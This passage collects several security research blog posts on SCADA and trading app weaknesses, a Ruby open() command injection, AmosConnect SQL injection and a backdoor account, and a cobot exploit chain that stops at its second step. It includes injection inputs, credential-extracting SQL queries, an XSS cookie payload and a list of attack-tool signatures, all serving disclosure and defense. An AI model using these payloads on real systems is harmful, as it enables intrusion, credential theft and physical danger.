Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.
Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subverting of HMI projects.
Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.
Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.
Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.
Never store sensitive data on SD cards or similar partitions without ACLs; such storage media cannot protect your sensitive data.
Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password.
Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic-curve key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.
Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.
If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).
Limit the permissions your application requires to the strict minimum.
Implement obfuscation and anti-tampering protections in your application.
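Two of the recommendations above (deriving keys from the application password instead of storing credentials, and enforcing a strict TLS configuration) can be illustrated with a short sketch. Production SCADA clients are typically Java or Kotlin on Android, so treat this Python version as a conceptual outline only; parameter choices such as the iteration count are assumptions:

```python
import hashlib
import hmac
import os
import ssl

def derive_keys(password: str, salt: bytes) -> tuple[bytes, bytes]:
    # PBKDF2-HMAC-SHA256 with a high iteration count; split the output
    # into an encryption key and a MAC key (encrypt-then-MAC construction)
    # rather than storing any raw credential on the device.
    material = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                                   200_000, dklen=64)
    return material[:32], material[32:]

def strict_tls_context() -> ssl.SSLContext:
    # create_default_context() already enables certificate-chain and
    # hostname verification; additionally reject anything below TLS 1.2.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

salt = os.urandom(16)
enc_key, mac_key = derive_keys("operator passphrase", salt)
tag = hmac.new(mac_key, b"HMI project blob", "sha256").digest()
```

The salt must be stored alongside the encrypted HMI project data; only the password stays in the operator's head (or in the platform's secure storage).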
Conclusions
Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015, we found a total of 50 issues in the 20 applications we analyzed; in 2017, we found a staggering 147 issues in the 34 applications we selected. This represents an average increase of roughly 1.8 vulnerabilities per application (from 2.5 to 4.3). We therefore conclude that the growth of IoT in the era of "everything is connected" has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly or indirectly influence the industrial process.
In 2015, we wrote:
SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.
We now concede that we were too optimistic and acknowledge that our previous statement was wrong. Over the past few years, the number of incidents in SCADA systems has increased, and the systems have become more attractive to attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks. Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications before it is too late. For the complete analysis, please download our white paper here.
Acknowledgments
Many thanks to Dmitriy Evdokimov, Gabriel Gonzalez, Pau Oliva, Alfredo Pironti, Ruben Santamarta, and Tao Sauvage for their help during our work on this research.
About Us
Alexander Bolshev
Alexander Bolshev is a Security Consultant for IOActive. He holds a Ph.D. in computer security and works as an assistant professor at Saint-Petersburg State Electrotechnical University. His research interests lie in distributed systems, as well as mobile, hardware, and industrial protocol security. He is the author of several white papers on topics of heuristic intrusion detection methods, Server Side Request Forgery attacks, OLAP systems, and ICS security. He is a frequent presenter at security conferences around the world, including Black Hat USA/EU/UK, ZeroNights, t2.fi, CONFIdence, and S4.
Ivan Yushkevich
Ivan is the information security auditor at Embedi (http://embedi.com). His main area of interest is source code analysis for applications ranging from simple websites to enterprise software. He has vast experience in banking systems and web application penetration testing.
IOActive
IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations throughout the Americas, EMEA, and Asia Pacific regions. Visit for more information. Read the IOActive Labs Research Blog. Follow IOActive on Twitter.
Embedi
Embedi's expertise is backed by extensive experience in the security of embedded devices, with special emphasis on attack and exploit prevention. Its software solutions are the product of years of research. Embedi has developed a wide range of security products for various types of embedded/smart devices used in different fields of life and industry, such as wearables, smart homes, retail environments, automotive, smart buildings, ICS, smart cities, and others. Embedi is headquartered in Berkeley, USA. Visit for more information and follow Embedi on Twitter.
Hidden Exploitable Behaviors in Programming Languages
By
Fernando Arnaboldi
On February 28th, 2015, Egor Homakov wrote an article[1] exposing the dangers of Ruby's open() function. The function is commonly used when requesting URLs programmatically with the open-uri library. However, instead of requesting URLs, you may end up executing operating system commands.
Consider the following Ruby script named open-uri.rb:
require 'open-uri'
print open(ARGV[0]).read
The following command requests a web page:
# ruby open-uri.rb "https://ioactive.com"
And the following output is shown:
<!DOCTYPE HTML>
<!--[if lt IE 9]><html class="ie"><![endif]-->
<!--[if !IE]><!--><html><!--<![endif]--><head>
<meta charset="UTF-8">
<title>IOActive is the global leader in cybersecurity, penetration testing, and computer services</title>
[...SNIP...]
It works as expected, right? Still, this command may be used to open a process that allows arbitrary commands to be executed. If a similar Ruby script is used in a web application with weak input validation, you could just prepend a pipe and your favorite OS command in a remote request (for example, supplying |id instead of a URL).
The difference between the two executions is just the pipe character at the beginning. The pipe character causes Ruby to stop using the function from open-uri and fall back to the native open() functionality, which allows command execution[2].
Applications may be susceptible to unpredictable security issues when using certain features of programming languages. A number of such features can be abused across different implementations, affecting otherwise secure applications; unexpected scenarios like this exist in the interpreters for JavaScript, Perl, PHP, Python, and Ruby.
Come and join me at Black Hat Europe[3] to learn more about these risky features and how to detect them. An open source extended differential fuzzing framework will be released to aid in the disclosure of these types of behaviors.
[1] Using open-uri? Check your code – you’re playing with fire! (https://sakurity.com/blog/2015/02/28/openuri.html)
AmosConnect: Maritime Communications Security Has Its Flaws
By
Mario Ballano
Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper in this area, and learned a lot more about some of the environments in which these systems are in place.
Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.
The maritime sector makes use of some of these systems to track and monitor ships' IT and navigation systems, as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don't differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.
Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect. AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as:
E-mail
Instant messaging
Position reporting
Crew Internet
Automatic file transfer
Application integration
We have identified two critical vulnerabilities in this software that allow pre-authenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.
Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit. The following POST request is sent when a user tries to log into AmosConnect:
The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks. Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.password';
SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.email_address';

The authentication method is implemented in mail_user.php:
The call to findByEmail() instantiates a COM object that is implemented in native C++ code.
The following C++ native methods are invoked upon execution of the call:
Neptune::UserManager::User::findByEmail(...)
Neptune::ConfigManager::Property::findBy(...)
Neptune::ConfigManager::Property::findAllBy(...)
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:
Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
"[...] deleted = 0 AND key like 'USER.%.email_address' AND upper(value) like '{email}'"
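The effect of this insecure concatenation can be reproduced with a toy in-memory database. The schema below is a simplification (just the MOBILE_PROPS table named in the queries above, without the deleted column), and the injected string is illustrative:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE MOBILE_PROPS (key TEXT, value TEXT)")
conn.execute("INSERT INTO MOBILE_PROPS VALUES ('USER.1.password', 's3cret')")

# The attacker-controlled email address lands inside the query string,
# so a crafted value can rewrite the WHERE clause entirely and a trailing
# "--" comments out the leftover closing quote.
email = "x' OR key LIKE 'USER.%.password' --"
query = ("SELECT key, value FROM MOBILE_PROPS "
         f"WHERE key LIKE 'USER.%.email_address' AND upper(value) LIKE '{email}'")
rows = conn.execute(query).fetchall()
# rows now contains the plaintext password row despite the email filter
```

Parameterized queries (prepared statements in the native C++ layer) would prevent this entire class of issue.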
Privileged Backdoor Account
The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
Users accessing the AmosConnect server see the following login screen:
The login page reveals the Post Office ID; this ID identifies the AmosConnect server and is tied to the software license.
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
authenticateBackdoorUser() is implemented as follows:
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:
Conclusions and thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
Navigation systems network. Some of the most recent vessels feature "sail-by-wire" technologies; the systems in charge of providing this technology are located in this network.
Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configurations, the ICS and Navigation networks may actually be the same.
IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members' work computers are connected to this network; it's within this network that AmosConnect is typically deployed.
Bring-Your-Own-Device (BYOD) networks. Vessels may feature a separate network to provide internet connectivity to guests or crew members' personal devices.
SATCOM. While this may change from vessel to vessel, some vessels use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, it's important to note that within certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD "guest" and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some of the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
Applications always contain security flaws, which is why we rely on multiple layers of defense. Yet even with exhaustive testing and layered defenses, applications still struggle to protect themselves. Perhaps we should rethink our approach to application defense, with the goal of introducing defensive methods that cause attackers to cease their efforts, or induce them to take incorrect actions based on false premises.
There are a variety of products that provide valuable resources when basic, off-the-shelf protection is required or the application source code is not available. However, implementations in native code provide a greater degree of defense that cannot be achieved using third-party solutions. This document aims to:
Enumerate a comprehensive list of current and new defensive techniques.
Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.
Enumerate methods to identify attack tools before they can access functionalities.
The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that the specific tool would trigger automatically.
Disclose how to detect attacker techniques within code.
Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.
Provide a new defensive approach.
Server-side defense is normally about blocking malicious IP addresses associated with attackers; however, an attacker's focus can also be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.
Provide these protections for multiple programming languages.
This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP.
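As a small illustration of the tool-identification idea above, many off-the-shelf attack tools ship with a recognizable default User-Agent; a minimal sketch follows (the signature list is illustrative and not taken from the specification itself):

```python
# Default User-Agent fragments of common attack tools when the operator
# does not bother to override them.
KNOWN_TOOL_SIGNATURES = ("sqlmap", "nikto", "dirbuster", "wpscan")

def looks_like_attack_tool(user_agent: str) -> bool:
    # A server-side hook can flag (or divert) requests whose User-Agent
    # matches a known tool signature before they reach any functionality.
    ua = user_agent.lower()
    return any(sig in ua for sig in KNOWN_TOOL_SIGNATURES)

print(looks_like_attack_tool("sqlmap/1.2.4#stable (http://sqlmap.org)"))   # True
print(looks_like_attack_tool("Mozilla/5.0 (Windows NT 10.0; Win64; x64)"))  # False
```

Sophisticated attackers will spoof these headers, of course, which is why the specification combines such checks with behavioral traps that tools trigger automatically.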
Fernando Arnaboldi appeared at Ruxcon to present defensive techniques that can be embedded in server-side applications. The techniques described are included in a specification, along with sample implementations for multiple programming languages.
Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps
By
Alejandro Hernandez
The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).
When it comes to financial cybersecurity, it's worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized into one single financial entity; there is one point of failure rather than many, which makes them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information, as well as the attack surface and vectors, in trading environments are slightly different than those in banking systems.
Picture taken from http://business.nasdaq.com/list/
Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.
Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Give buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.
Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.
Before I pass along my results, I’d like to share the interesting and controversial moral of the story: The app developed by a brokerage firm who suffered a data breach many years ago was shown to be the most secure one.
Scope
My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.
Devices:
iOS 10.3.3 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.
Results
Unfortunately, the results proved to be much worse than those for personal banking apps in 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.
The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.
Cleartext Passwords Exposed
In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it's relatively easy), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not have two-factor authentication (2FA) implemented; therefore, no authorization one-time password (OTP) is sent to the user's phone or email.
In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:
Trading and Account Information Exposed
In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous a ransom could be.
Balances and investment portfolio leaked in logs:
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
“Favorites” watchlists leaked in the logs too:
Quoted tickers leaked:
Quoted symbol dumped in detail in the console:
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:
Insecure Communication
Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on the mobile device.
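For reference, here is a minimal sketch of certificate pinning: the client compares the SHA-256 fingerprint of the server’s DER-encoded certificate against a value shipped with the app, and aborts on a mismatch. Mobile apps would do the equivalent with their platform’s TLS APIs; the function names here are illustrative:

```python
import hashlib
import socket
import ssl

def cert_fingerprint(der_cert: bytes) -> str:
    """SHA-256 fingerprint of a DER-encoded certificate."""
    return hashlib.sha256(der_cert).hexdigest()

def connect_pinned(host: str, port: int, pinned_sha256: str) -> ssl.SSLSocket:
    """Open a TLS connection and verify the server cert against a pinned hash."""
    ctx = ssl.create_default_context()
    sock = ctx.wrap_socket(socket.create_connection((host, port)),
                           server_hostname=host)
    der = sock.getpeercert(binary_form=True)
    if cert_fingerprint(der) != pinned_sha256:
        sock.close()
        raise ssl.SSLError("certificate fingerprint does not match the pin")
    return sock
```

With pinning in place, a MiTM proxy presenting a different certificate fails the fingerprint check even if the user was tricked into installing its root CA.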
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Sockets Layer) won’t enable it on the login screen, and all sensitive data will be sent and received in cleartext, without encryption:
One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.
Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcastings) through insecure channels, which does not seem to represent a risk to the user.
Authentication and Session Management
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:
Privacy Mode
Only one trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customers’ private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.
However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:
It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:
Client-side Data Validation
In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTM attacks and inject malicious JavaScript or HTML code into the server responses. Since the WebViews in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.
XSS triggered in two different apps (<script>alert(document.cookie);</script>):
Fake HTML forms injected to deceive the user and steal credentials:
Root Detection
Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.
20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:
Hardcoded Secrets in Code and App Obfuscation
Six Android app installers (.apk files) were easily reverse engineered to human-readable code. The rest had medium to high levels of obfuscation, such as the one shown below. The goal of obfuscation is to conceal the application’s purpose and logic (security through obscurity) in order to deter and complicate reverse engineering.
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) have traces (internal hostnames and IPs) about the internal development and testing environments where they were made or tested:
Other Weaknesses
The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app, but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged-in user. From there, you can ask for details about your account. As you can see, all you need to retrieve someone else’s private data is their email address and first name:
I haven’t had enough time to fully test this feature, but so far I have been able to extract balances and personal information.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure; thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher-risk vulnerabilities discussed in this article.
To date, only two brokerage firms have replied to our email.
Regulators and Rating Organizations
Digging in some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end-users or institutions such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.
Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.
Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glanced at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks on the financial industry, I think these organizations should give accolades to, or at least mention, the security mechanisms the evaluated trading platforms implement in their reviews. Security controls should equal a competitive advantage.
Conclusions and Recommendations
There’s still a long way to go to improve the maturity level of security in mobile trading apps.
Desktop and web platforms should also be tested and improved.
Regulators should encourage brokers to implement safeguards for a better trading environment.
In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
End users should enable all of the security mechanisms their apps offer.
Side Thought
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
Traditional industrial robots are boring. Typically, they are autonomous or operate with limited guidance and execute repetitive, programmed tasks in manufacturing and production settings.1 They are often used to perform duties that are dangerous or unsuitable for workers; therefore, they operate in isolation from humans and other valuable machinery.
This is not the case with the latest generation collaborative robots (“cobots”) though. They function with co-workers in shared workspaces while respecting safety standards. This generation of robots works hand-in-hand with humans, assisting them, rather than just performing automated, isolated operations. Cobots can learn movements, “see” through HD cameras, or “hear” through microphones to contribute to business success.
UR5 by Universal Robots2
Baxter by Rethink Robotics3
So cobots present a much more interesting attack surface than traditional industrial robots. But are cobots only limited to industrial applications? NO, they can also be integrated into other settings!
The Moley Robotic Kitchen (2xUR10 Arms)4
DARPA’s ALIAS Robot (UR3 Arm)5
Last February, Cesar Cerrudo (@cesarcer) and I published a non-technical paper “Hacking Robots Before Skynet” previewing our research on several home, business, and industrial robots from multiple well-known vendors. We discovered nearly 50 critical security issues. Within the cobot sector, we audited leading robots, including Baxter/Sawyer from Rethink Robotics and UR by Universal Robots.
● Baxter/Sawyer: We found authentication issues, insecure transport in their protocols, default deployment problems, susceptibility to physical attacks, and the usage of ROS, a research framework known to be vulnerable to multiple issues. The major problems we reported appear to have been patched by the company in February 2017.
● UR: We found authentication issues in many of the control protocols, susceptibility to physical attacks, memory corruption vulnerabilities, and insecure communication transport. All of the issues remain unpatched in the latest version (3.4.2.65, May 2017).6
In accordance with IOActive’s responsible disclosure policy, we contacted the vendors last January, so they have had ample time to address the vulnerabilities and inform their customers. Our goal is to make cobots more secure and prevent vulnerabilities from being exploited by attackers to cause serious harm to industries, employees, and their surroundings. I truly hope this blog entry moves the collaborative industry forward so we can safely enjoy this and future generations of robots.
In this post, I will discuss how an attacker can chain multiple vulnerabilities in a leading cobot (UR3, UR5, UR10 – Universal Robots) to remotely modify safety settings, violating applicable safety laws and, consequently, causing physical harm to the robot’s surroundings by moving it arbitrarily.
This attack serves as an example of how dangerous these systems can be if they are hacked. Manipulating safety limits and disabling emergency buttons could directly threaten human life. Imagine what could happen if an attack targeted an array of 64 cobots as is found in a Chinese industrial corporation.7
The final exploit abuses six vulnerabilities to change safety limits and disable safety planes and emergency buttons/sensors remotely over the network. The cobot arm swings wildly about, wreaking havoc. This video demonstrates the attack: https://www.youtube.com/watch?v=cNVZF7ZhE-8
Q: Can these robots really harm a person?
A: Yes. A study8 by the Control and Robotics Laboratory at the École de technologie supérieure (ÉTS) in Montreal (Canada) clearly shows that even the smaller UR5 model is powerful enough to seriously harm a person. While running at slow speeds, their force is more than sufficient to cause a skull fracture.9

Q: Wait…don’t they have safety features that prevent them from harming nearby humans?
A: Yes, but they can be hacked remotely, and I will show you how in the next technical section.

Q: Where are these deployed?
A: All over the world, in multiple production environments every day.10

Integrators Define All Safety Settings
Universal Robots is the manufacturer of UR robots. The company that installs UR robots in a specific application is the integrator. Only an integrated and installed robot is considered a complete machine. The integrators of UR robots are responsible for ensuring that any significant hazard in the entire robot system is eliminated. This includes, but is not limited to:11
Conducting a risk assessment of the entire system. In many countries this is required by law
Interfacing other machines and additional safety devices if deemed appropriate by the risk assessment
Setting up the appropriate safety settings in the Polyscope software (control panel)
Ensuring that the user will not modify any safety measures by using a “safety password.”
Validating that the entire system is designed and installed correctly
Universal Robots has recognized potentially significant hazards, which must be considered by the integrator, for example:
Penetration of skin by sharp edges and sharp points on tools or tool connectors
Penetration of skin by sharp edges and sharp points on obstacles near the robot track
Bruising due to stroke from the robot
Sprain or bone fracture due to strokes between a heavy payload and a hard surface
Mistakes due to unauthorized changes to the safety configuration parameters
Some safety-related features are purposely designed for cobot applications. These features are particularly relevant when addressing specific areas in the risk assessment conducted by the integrator, including:
Force and power limiting: Used to reduce clamping forces and pressures exerted by the robot in the direction of movement in case of collisions between the robot and operator.
Momentum limiting: Used to reduce high-transient energy and impact forces in case of collisions between robot and operator by reducing the speed of the robot.
Tool orientation limiting: Used to reduce the risk associated with specific areas and features of the tool and work-piece (e.g., to avoid sharp edges to be pointed towards the operator).
Speed limitation: Used to ensure the robot arm operates at a low speed.
Safety boundaries: Used to restrict the workspace of the robot by forcing it to stay on the correct side of defined virtual planes and not pass through them.
Safety planes in action12
Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.
Safety scanner13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide
Changing Safety Configurations Remotely
“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
The exploitation process to remotely change the safety configuration is as follows:
Step 1. Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2. Exploit a stack-based buffer overflow in the UR Modbus TCP service, and execute commands as root.
